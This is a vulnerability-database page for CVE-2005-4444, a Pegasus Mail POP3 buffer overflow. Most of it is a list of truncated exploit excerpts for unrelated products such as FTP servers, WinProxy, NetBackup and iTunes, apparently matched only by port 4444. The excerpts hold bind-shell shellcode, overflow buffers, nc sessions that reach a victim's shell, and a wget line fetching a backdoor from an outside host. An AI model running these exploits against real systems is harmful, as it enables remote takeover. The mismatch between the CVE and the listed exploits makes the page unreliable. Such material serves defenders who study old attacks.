CVE-2005-4444
published 2005-12-21CVE-2005-4444: Stack-based buffer overflow in the trace message functionality in Pegasus Mail 4.21a through 4.21c and 4.30PB1 allow remote attackers to execute arbitrary code…
PriorityP425medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EPSS
3.16%
86.4th percentile
Stack-based buffer overflow in the trace message functionality in Pegasus Mail 4.21a through 4.21c and 4.30PB1 allow remote attackers to execute arbitrary code via a long POP3 reply.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| david_harris | pegasus_mail | — | — |
| david_harris | pegasus_mail | — | — |
| david_harris | pegasus_mail | — | — |
| david_harris | pegasus_mail | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
exploitdb·2013-03-29
CVE-2005-0575 KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
---
#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7
require 'net/http'
require 'uri'
require 'socket'
############################################
# bind port 4444
sc_bind =
"\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" +
"\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" +
"\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" +
"\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" +
"\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\
Exploit-DB
Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
exploitdb·2006-01-16
CVE-2005-3116 Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
---
/*
DESCRIPTION
Veritas NetBackup Stack Overflow (tcp/13701)
"Volume Manager Daemon" Module
Advisories
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
http://www.frsirt.com/english/advisories/2005/2349
USAGE
C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
Sending first buffer.
Sending second buffer.
C:\NetBackup>nc 192.168.0.200 4444
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
INFORMATION
I wrote this just for educational purposes :).
Because the buffer is only very small, I had to write small shellcode.
The code is less than 100 bytes, and there are 6 bytes left.
Exploit-DB
BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)
exploitdb·2006-01-07
CVE-2005-4085 BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)
BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)
---
#!perl
#
# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
#
# Author: FistFucker (aka FistFuXXer)
# e-Mail: [email protected]
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
#
# CVE info:
# CAN-2005-4085
#
use IO::Socket;
#
# destination IP address
#
$ip = '127.0.0.1';
#
# destination TCP port
#
$port = 80;
#
# SE handler. 0x00, 0x0a, 0x0d free
#
$seh = reverse( "\x01\x03\x12\x40" ); # POP/POP/RET
# PAVDLL.01031240
#
# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
#
$jmp = "\x90\x90\xeb\x32"; # [NOP][NOP][JMP|JMP]
#
# 0x00, 0x0a, 0x0d free shellcode
#
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "\x31\xc9\x83\x
Exploit-DB
Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)
exploitdb·2005-06-24
CVE-2005-1213 Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)
Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)
---
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
/* win32_bind - EXITFUNC=process LPORT=4444 Size=344
Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x96"
"\x27\xc8\x3e\x83\xeb\xfc\xe2\xf4\x6a\x4d\x23\x73\x7e\xde\x37\xc1"
"\x69\x47\x43\x52\xb2\x03\x43\x7b\xaa\xac\xb4\x3b\xee\x26\x27\xb5"
"\xd9\x3f\x43\x61\xb6\x26\x23\x77\x1d\x13\x43\x3f\x78\x16\x08\xa7"
"\x3a\xa3\x08\x4a\x91\xe6\x02\x33\x97\xe5\x23\xca\xad\x73\xec\x16"
"\xe3\xc2\x43\x61\xb2\x26\x23\x58\x1d\x2b\x83\xb5\xc9\x3b\xc9\xd5"
"\x95\x0b\x43\xb7\xfa\x03\xd4\x5f\x55\x16\x13\x5a\x1d\x64\xf8\xb5"
"\xd6\x2b\x43\x4e\x8a\x8a\x43\x7e\x9e\x79\xa0\xb0\xd8\x29\x24\x6e"
"\x69\x
Exploit-DB
PeerCast 0.1211 - Remote Format String
exploitdb·2005-06-20
CVE-2005-1806 PeerCast 0.1211 - Remote Format String
PeerCast 0.1211 - Remote Format String
---
/*
\ PeerCast >]
\
/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
\
/ uKt researcherz [ http://unl0ck.org ]
\
/ greetz goes to: uKt researcherz.
\
/
\ - smallest code - better code!!!
/
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//*******************************************
#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}
//*******************************************
//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\
Exploit-DB
Webhints 1.03 - Remote Command Execution (Perl) (1)
exploitdb·2005-06-11
CVE-2005-1950 Webhints 1.03 - Remote Command Execution (Perl) (1)
Webhints 1.03 - Remote Command Execution (Perl) (1)
---
# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke
#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: [email protected] #
# #
#This Xpl Run a backdo0r in Server With 4444 Port. #
#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded #
###################################
Exploit-DB
WebAPP 0.9.9.2.1 - Remote Command Execution (1)
exploitdb·2005-05-20
CVE-2005-1628 WebAPP 0.9.9.2.1 - Remote Command Execution (1)
WebAPP 0.9.9.2.1 - Remote Command Execution (1)
---
!/usr/bin/perl
#################################################################
# T r a p - S e t U n d e r G r o u n D H a c k i n g T e a m #
#################################################################
# Remote C0mmand Executing Expl0it - For WebAPP CGI
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v );
#E-Mail : [email protected]
# [email protected]
#This xpl Open a Backdoor in 4444 Port with Nobody Access !!! All Of The *NIX OS that Have UnPatch
#apage.cgi is Vulnerable in this M0ment !!
#
#################################################################
# Gr33tz To ==> AlphaST.Com , Crouz.Com , Simorgh-ev.Com And MH_P0rtal , Oil_Krachack #
################################################################
Exploit-DB
GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
exploitdb·2005-05-01
CVE-2005-1415 GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
---
#!/usr/bin/python
###############################################
# GlobalScape Secure FTP Server Buffer Overflow
# Coded by [email protected]
# http://www.see-security.com
# http://www.hackingdefined.com/exploits/Globalscape30.pdf
###############################################
# EIP Overwrite
# root@[muts]# ./globalscape-3.0-ftp.py
#
# [+] Evil GlobalFTP 3.0 Secure Server Exploit
# [+] Coded by mati [at] see-security [dot] com
# [+] 220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *
#
# [+] Sending Username
# [+] Sending Password
# [+] Sending evil buffer
# [+] Connect to port 4444 on victim Machine!
#
# root@[muts]# nc -v 192.168.1.153 4444
# [192.168.1.153] 4444 (?) open
# Microsoft Windows 2000 [Version
Exploit-DB
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)
exploitdb·2005-04-29
CVE-2005-0634 Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)
---
/*
\ golden ftp 2.52.0.0 remote r00t exploit
/
\ remote r00t exploit binds 4444 port on remote machine.
/ tested on: winxp sp0 rus
\
/ simple stack overflow in golden ftpd.
\ if retaddr isn't right, ftpd will crash, and admin will be in big shit
/ 'coz ftpd won't start later ;)
\
/ code to be executed, admin must restart or shutdown ftpd... then ftpd will execute eviLDuDe'Z c0de )
\
/ gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy
\ ilja, esDee, blackhatz.inf0, sk3w
/ p.s }:+ EvILduDe
\ (c) uKt research '04/'05
*/
#include
#include
#include
#include
#include
#define RETADDR 0x77F510B0
char shellcode[]= // binds 4444 port
"\xd9\xEE\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x7
Exploit-DB
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)
exploitdb·2005-04-29
CVE-2005-0634 Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)
---
/*
Golden FTP Server Pro remote stack BOF exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
risk : highly critical
vender status : no patch released , all targets are vuln
package : golden-ftp-server-pro 2.5.0.0 and prior
advisory : http://secunia.com/advisories/15156/
vender address : www.goldenftpserver.com
timeline :
28 Apr 2005 : Public Disclosure
29 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
after running the exploit u need to restart the server after that
the server will be closed automatically then u will have a shell
on port 4444 . if u want to erase the crap just clean the GFTPpro.log
manually as mentioned in the advisory .
workaround : upgrade to newer version or use anothe
Exploit-DB
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)
exploitdb·2005-04-29
CVE-2005-0634 Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)
Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)
---
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan and metasploit
* Usage:exploit
*
*/
/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/
#include
#include
#pragma comment(lib, "ws2_32.lib")
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Exploit-DB
NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow
exploitdb·2005-04-26
CVE-2005-1323 NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow
NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow
---
#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#
import struct
import socket
import sys
import time
class warftpd:
def __init__(self, host, port):
self.host = host
self.port = port
self.bsize = 512
self.ebpaddr = 0xcacacaca
self.retaddr = 0xdeadbeef
self.sctype = 'findskt'
self.scport = None
def setebpaddr(self, addr):
self.ebpaddr = addr
def setretaddr(self, addr):
self.retaddr = addr
def setbsize(self, size):
self.bsize = size
def setsctype(self, type):
self.sctype = type
def setscport(self, port):
self.scport = port
def genbuffer(self):
##
# Alpha port bind 4444, thanx metasploit
##
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\
Exploit-DB
Golden FTP Server 2.02b - Remote Buffer Overflow
exploitdb·2005-01-22
CVE-2005-0566 Golden FTP Server 2.02b - Remote Buffer Overflow
Golden FTP Server 2.02b - Remote Buffer Overflow
---
#!/usr/bin/perl -w
# Barabas - www.whitehat.co.il -
# cheers to muts and all peeps at WH.
# XPSP2 goldenftpserver sploit - bind 4444
use strict;
use Net::FTP;
my $payload="\x41"x260;
$payload .="\x65\x82\xa5\x7c";#jmpesp
$payload .="\x90"x32;#not really necessary...blah
# win32_bind - EXITFUNC=seh LPORT=4444 Size=321 Encoder=None http://metasploit.com
$payload .="\xfc\x6a\xeb\x4f\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3".
"\x30\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1".
"\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe3\x8b\x5f\x24\x01".
"\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24".
"\x1c\x61\xc3\x31\xc0\x64\x8b\x40\x30\x
Exploit-DB
Apple iTunes - Playlist Parsing Local Buffer Overflow
exploitdb·2005-01-16
CVE-2005-0043 Apple iTunes - Playlist Parsing Local Buffer Overflow
Apple iTunes - Playlist Parsing Local Buffer Overflow
---
/*
* PoC for iTunes on OS X 10.3.7
* -( [email protected] )-
*
* Generates a .pls file, when loaded in iTunes it
* binds a shell to port 4444.
* Shellcode contains no \x00 or \x0a's.
*
* sample output:
*
* -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
* -( fm-eyetewnz )-
* -( [email protected] )-
* Creating file: foo.pls.
* Bindshell on port: 4444
* -[nemo@gir:~]$ open foo.pls
* -[nemo@gir:~]$ nc localhost 4444
* id
* uid=501(nemo) gid=501(nemo) groups=501(nemo)
*
* Thanks to andrewg, mercy and core.
* Greetings to pulltheplug and felinemenace.
*
* -( need a challenge? )-
* -( http://pulltheplug.org )-
*/
#include
#include
#define BUFSIZE 1598 + 4
char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"
No writeups or analysis indexed.
http://secunia.com/advisories/17992http://secunia.com/secunia_research/2005-61/advisory/http://securitytracker.com/id?1015385http://www.osvdb.org/21842http://www.pmail.com/newsflash.htm#secuniahttp://www.securityfocus.com/archive/1/419908/100/0/threadedhttp://www.securityfocus.com/bid/15973http://www.vupen.com/english/advisories/2005/3004http://secunia.com/advisories/17992http://secunia.com/secunia_research/2005-61/advisory/http://securitytracker.com/id?1015385http://www.osvdb.org/21842http://www.pmail.com/newsflash.htm#secuniahttp://www.securityfocus.com/archive/1/419908/100/0/threadedhttp://www.securityfocus.com/bid/15973http://www.vupen.com/english/advisories/2005/3004
2005-12-21
Published